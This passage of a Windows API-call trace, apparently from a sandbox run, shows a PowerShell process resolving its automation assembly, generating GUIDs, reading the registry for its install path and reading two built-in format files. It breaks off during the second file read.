	[0687.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0687.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0689.294] VirtualQuery (in: lpAddress=0x14be60, lpBuffer=0x14cd20, dwLength=0x30 | out: lpBuffer=0x14cd20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.295] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xf05c8fc6, Data2=0x230f, Data3=0x4733, Data4=([0]=0xad, [1]=0x8d, [2]=0xf8, [3]=0x16, [4]=0x64, [5]=0xd7, [6]=0x1c, [7]=0x7a))) returned 0x0
	[0689.297] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe931d4b9, Data2=0x9f2f, Data3=0x43f0, Data4=([0]=0x85, [1]=0x65, [2]=0xc0, [3]=0xda, [4]=0xf6, [5]=0x4e, [6]=0x3e, [7]=0x50))) returned 0x0
	[0689.297] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.298] VirtualQuery (in: lpAddress=0x14c010, lpBuffer=0x14ced0, dwLength=0x30 | out: lpBuffer=0x14ced0*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.299] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xd9b7328, Data2=0x7bd2, Data3=0x4144, Data4=([0]=0x93, [1]=0xea, [2]=0x2a, [3]=0xcf, [4]=0x7d, [5]=0x6a, [6]=0x3b, [7]=0x22))) returned 0x0
	[0689.302] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xdc6d1d6e, Data2=0x2ac1, Data3=0x4127, Data4=([0]=0xac, [1]=0x8c, [2]=0x3b, [3]=0xf5, [4]=0xf3, [5]=0xcd, [6]=0x30, [7]=0x8c))) returned 0x0
	[0689.302] VirtualQuery (in: lpAddress=0x14c260, lpBuffer=0x14d120, dwLength=0x30 | out: lpBuffer=0x14d120*(BaseAddress=0x14c000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.303] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x33c6e289, Data2=0x984d, Data3=0x4e2c, Data4=([0]=0x8b, [1]=0x4f, [2]=0xd6, [3]=0x2b, [4]=0x31, [5]=0xe5, [6]=0x39, [7]=0xa8))) returned 0x0
	[0689.303] VirtualQuery (in: lpAddress=0x14b8d0, lpBuffer=0x14c790, dwLength=0x30 | out: lpBuffer=0x14c790*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0689.303] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x85b70538, Data2=0x15eb, Data3=0x4283, Data4=([0]=0x8c, [1]=0x95, [2]=0xb6, [3]=0x64, [4]=0x6e, [5]=0xe, [6]=0x26, [7]=0x59))) returned 0x0
	[0689.303] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xbb2bf0aa, Data2=0x256f, Data3=0x49f9, Data4=([0]=0xb6, [1]=0xaa, [2]=0x83, [3]=0xa4, [4]=0x63, [5]=0xd6, [6]=0xce, [7]=0xdf))) returned 0x0
	[0689.304] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0689.304] GetFileType (hFile=0x2f4) returned 0x1
	[0689.304] SetErrorMode (uMode=0x1) returned 0x1
	[0689.304] GetFileType (hFile=0x2f4) returned 0x1
	[0689.304] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.402] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.403] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.403] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.404] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.404] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.405] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.405] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.406] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.406] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.406] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.407] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.409] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.409] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0xbce, lpOverlapped=0x0) returned 1
	[0690.410] ReadFile (in: hFile=0x2f4, lpBuffer=0x3224b7e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3224b7e*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0690.410] ReadFile (in: hFile=0x2f4, lpBuffer=0x3225448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3225448*, lpNumberOfBytesRead=0x14d338*=0x0, lpOverlapped=0x0) returned 1
	[0690.410] CloseHandle (hObject=0x2f4) returned 1
	[0690.410] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0690.410] SetErrorMode (uMode=0x1) returned 0x1
	[0690.410] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d2e0 | out: lpFileInformation=0x14d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0690.411] SetErrorMode (uMode=0x1) returned 0x1
	[0690.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0690.411] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d3c8 | out: phkResult=0x14d3c8*=0x2f4) returned 0x0
	[0690.411] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d34c, lpData=0x0, lpcbData=0x14d348*=0x0 | out: lpType=0x14d34c*=0x1, lpData=0x0, lpcbData=0x14d348*=0x56) returned 0x0
	[0690.411] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d2170
	[0690.411] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d31c, lpData=0x1b7d2170, lpcbData=0x14d318*=0x56 | out: lpType=0x14d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d318*=0x56) returned 0x0
	[0690.411] CoTaskMemFree (pv=0x1b7d2170) 
	[0690.411] RegCloseKey (hKey=0x2f4) returned 0x0
	[0690.411] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0690.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0690.413] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xa1f2f8b, Data2=0x1eb7, Data3=0x48a0, Data4=([0]=0x90, [1]=0xd9, [2]=0xa1, [3]=0xd7, [4]=0xc1, [5]=0xa5, [6]=0xaa, [7]=0x31))) returned 0x0
	[0690.413] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xa0372bf3, Data2=0xff5c, Data3=0x4f9c, Data4=([0]=0xb5, [1]=0xaa, [2]=0xe8, [3]=0x91, [4]=0x6b, [5]=0xb, [6]=0x11, [7]=0x72))) returned 0x0
	[0690.413] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x33332271, Data2=0x43, Data3=0x4b79, Data4=([0]=0x98, [1]=0x40, [2]=0x8d, [3]=0xb9, [4]=0x9e, [5]=0x5e, [6]=0x1c, [7]=0xa1))) returned 0x0
	[0690.413] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xacbeb7b6, Data2=0x920e, Data3=0x4342, Data4=([0]=0x81, [1]=0x23, [2]=0xa6, [3]=0x7b, [4]=0x9d, [5]=0x99, [6]=0xfe, [7]=0xc2))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x14b457f0, Data2=0x75c3, Data3=0x4d8c, Data4=([0]=0x91, [1]=0x8b, [2]=0xcb, [3]=0x91, [4]=0x9f, [5]=0xfb, [6]=0x12, [7]=0xe3))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xac4aa133, Data2=0xc2fb, Data3=0x4181, Data4=([0]=0x9b, [1]=0xc1, [2]=0x7b, [3]=0xee, [4]=0x4c, [5]=0xcf, [6]=0x90, [7]=0x2a))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5de198af, Data2=0x931b, Data3=0x4ecd, Data4=([0]=0xbd, [1]=0xc1, [2]=0x41, [3]=0x5d, [4]=0xc5, [5]=0xc5, [6]=0xd3, [7]=0x8a))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5e62f72b, Data2=0x3662, Data3=0x4072, Data4=([0]=0x80, [1]=0x16, [2]=0x2, [3]=0xc8, [4]=0xb6, [5]=0x9c, [6]=0x2c, [7]=0xaf))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x5f0d4a75, Data2=0xd902, Data3=0x4531, Data4=([0]=0xa3, [1]=0xb1, [2]=0x35, [3]=0x71, [4]=0x58, [5]=0x63, [6]=0xcc, [7]=0x6d))) returned 0x0
	[0690.414] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xd0313d6, Data2=0x9d9e, Data3=0x4a4d, Data4=([0]=0x82, [1]=0x3a, [2]=0x14, [3]=0x81, [4]=0x97, [5]=0xdf, [6]=0x76, [7]=0x88))) returned 0x0
	[0690.415] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x991c4616, Data2=0x806d, Data3=0x4e8c, Data4=([0]=0x8e, [1]=0xb7, [2]=0x41, [3]=0x64, [4]=0xe0, [5]=0xe5, [6]=0x50, [7]=0x14))) returned 0x0
	[0690.415] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x3af3362, Data2=0x7315, Data3=0x452f, Data4=([0]=0x93, [1]=0x11, [2]=0xd5, [3]=0xdc, [4]=0xa9, [5]=0xcd, [6]=0x37, [7]=0xbf))) returned 0x0
	[0690.415] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xee1b1a87, Data2=0x1599, Data3=0x4a7a, Data4=([0]=0xa3, [1]=0x0, [2]=0xed, [3]=0x1c, [4]=0x3f, [5]=0x87, [6]=0xb6, [7]=0x2f))) returned 0x0
	[0690.415] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x537f12ba, Data2=0x85b7, Data3=0x4582, Data4=([0]=0xb2, [1]=0x4e, [2]=0xa0, [3]=0xce, [4]=0x95, [5]=0xe6, [6]=0x11, [7]=0x63))) returned 0x0
	[0690.415] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xdea520e2, Data2=0xf955, Data3=0x4c9e, Data4=([0]=0x87, [1]=0x26, [2]=0x6e, [3]=0x18, [4]=0xd6, [5]=0x44, [6]=0x85, [7]=0xc5))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x1255e0c3, Data2=0x41ed, Data3=0x4908, Data4=([0]=0xa8, [1]=0x4e, [2]=0xac, [3]=0xb3, [4]=0xc, [5]=0x77, [6]=0xd7, [7]=0x95))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xa8724278, Data2=0x4ec4, Data3=0x4102, Data4=([0]=0x85, [1]=0x93, [2]=0xd7, [3]=0xa6, [4]=0xcf, [5]=0x46, [6]=0x94, [7]=0x4e))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x43815779, Data2=0x16fc, Data3=0x4894, Data4=([0]=0xbb, [1]=0xa0, [2]=0x80, [3]=0x3d, [4]=0x31, [5]=0x55, [6]=0x7c, [7]=0x70))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x779b84a3, Data2=0xab80, Data3=0x42c9, Data4=([0]=0xa5, [1]=0x6d, [2]=0x8, [3]=0xd3, [4]=0xe6, [5]=0x5a, [6]=0x6b, [7]=0x29))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x34a054aa, Data2=0xffb7, Data3=0x4a35, Data4=([0]=0x8c, [1]=0x60, [2]=0x86, [3]=0x4c, [4]=0x80, [5]=0x86, [6]=0xb8, [7]=0xb0))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x69c849f9, Data2=0xa24e, Data3=0x42bf, Data4=([0]=0xad, [1]=0x8d, [2]=0x77, [3]=0xd5, [4]=0x85, [5]=0x5d, [6]=0x3d, [7]=0x13))) returned 0x0
	[0690.416] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x4f75812e, Data2=0xcd9e, Data3=0x4f81, Data4=([0]=0x94, [1]=0xdf, [2]=0x63, [3]=0x8a, [4]=0x32, [5]=0xf2, [6]=0x79, [7]=0xba))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xc7b218d8, Data2=0x2a2c, Data3=0x494b, Data4=([0]=0x89, [1]=0x19, [2]=0xbd, [3]=0x2b, [4]=0x33, [5]=0x15, [6]=0xf7, [7]=0xe5))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x603516ca, Data2=0x8b63, Data3=0x4ca1, Data4=([0]=0xa8, [1]=0x40, [2]=0x30, [3]=0xcc, [4]=0xef, [5]=0xcf, [6]=0x98, [7]=0x22))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x7384fd0d, Data2=0xcacc, Data3=0x4dd9, Data4=([0]=0xb5, [1]=0xa3, [2]=0x29, [3]=0xc0, [4]=0x9c, [5]=0x2c, [6]=0xf8, [7]=0x2d))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x87cfb617, Data2=0xcc3b, Data3=0x4438, Data4=([0]=0xa1, [1]=0xa9, [2]=0x8e, [3]=0x55, [4]=0x82, [5]=0xf7, [6]=0xb3, [7]=0x70))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xceac3064, Data2=0x57f0, Data3=0x4b80, Data4=([0]=0x8c, [1]=0x68, [2]=0x93, [3]=0x92, [4]=0xba, [5]=0x15, [6]=0x69, [7]=0x8c))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xd5940ec3, Data2=0x7d78, Data3=0x48ed, Data4=([0]=0x9e, [1]=0x95, [2]=0x1e, [3]=0x27, [4]=0x29, [5]=0xb7, [6]=0xb7, [7]=0x2c))) returned 0x0
	[0690.417] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x85642d99, Data2=0x8e4d, Data3=0x425a, Data4=([0]=0x8a, [1]=0x4e, [2]=0xf2, [3]=0xc6, [4]=0x87, [5]=0x77, [6]=0xea, [7]=0x5f))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xa1719db5, Data2=0x7cc8, Data3=0x42c9, Data4=([0]=0x91, [1]=0x88, [2]=0x22, [3]=0xb6, [4]=0x3a, [5]=0x5d, [6]=0x94, [7]=0x17))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x187ddeac, Data2=0x48ed, Data3=0x445c, Data4=([0]=0xb2, [1]=0x9e, [2]=0xbb, [3]=0xbd, [4]=0xfa, [5]=0x90, [6]=0xa9, [7]=0xec))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x81c9cdb, Data2=0x97e5, Data3=0x4dfa, Data4=([0]=0x85, [1]=0x82, [2]=0x38, [3]=0x8f, [4]=0xc0, [5]=0xe, [6]=0xbb, [7]=0x11))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xeb46931c, Data2=0x41df, Data3=0x4364, Data4=([0]=0x85, [1]=0x6f, [2]=0x1f, [3]=0x9, [4]=0x6b, [5]=0x54, [6]=0xfb, [7]=0xe))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x50cd9af3, Data2=0x94b8, Data3=0x4ee2, Data4=([0]=0xbd, [1]=0x90, [2]=0xf1, [3]=0x9, [4]=0xea, [5]=0xa7, [6]=0xb8, [7]=0x92))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xe3956a20, Data2=0xf40e, Data3=0x4f1a, Data4=([0]=0xa9, [1]=0x5, [2]=0x81, [3]=0x3e, [4]=0x16, [5]=0xdf, [6]=0xeb, [7]=0xff))) returned 0x0
	[0690.418] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0x9a4bbad1, Data2=0x835d, Data3=0x4284, Data4=([0]=0x80, [1]=0x21, [2]=0x87, [3]=0x35, [4]=0x72, [5]=0xd5, [6]=0xae, [7]=0x4d))) returned 0x0
	[0690.419] CoCreateGuid (in: pguid=0x14d5f0 | out: pguid=0x14d5f0*(Data1=0xdbe9ca0, Data2=0x2796, Data3=0x4b60, Data4=([0]=0x97, [1]=0x97, [2]=0x6d, [3]=0xcf, [4]=0xd5, [5]=0xfd, [6]=0xfc, [7]=0xa7))) returned 0x0
	[0690.419] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0690.420] GetFileType (hFile=0x2f4) returned 0x1
	[0690.420] SetErrorMode (uMode=0x1) returned 0x1
	[0690.420] GetFileType (hFile=0x2f4) returned 0x1
	[0690.420] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.421] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.421] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.421] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
	[0690.421] ReadFile (in: hFile=0x2f4, lpBuffer=0x3335e88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d338, lpOverlapped=0x0 | out: lpBuffer=0x3335e88*, lpNumberOfBytesRead=0x14d338*=0x1000, lpOverlapped=0x0) returned 1
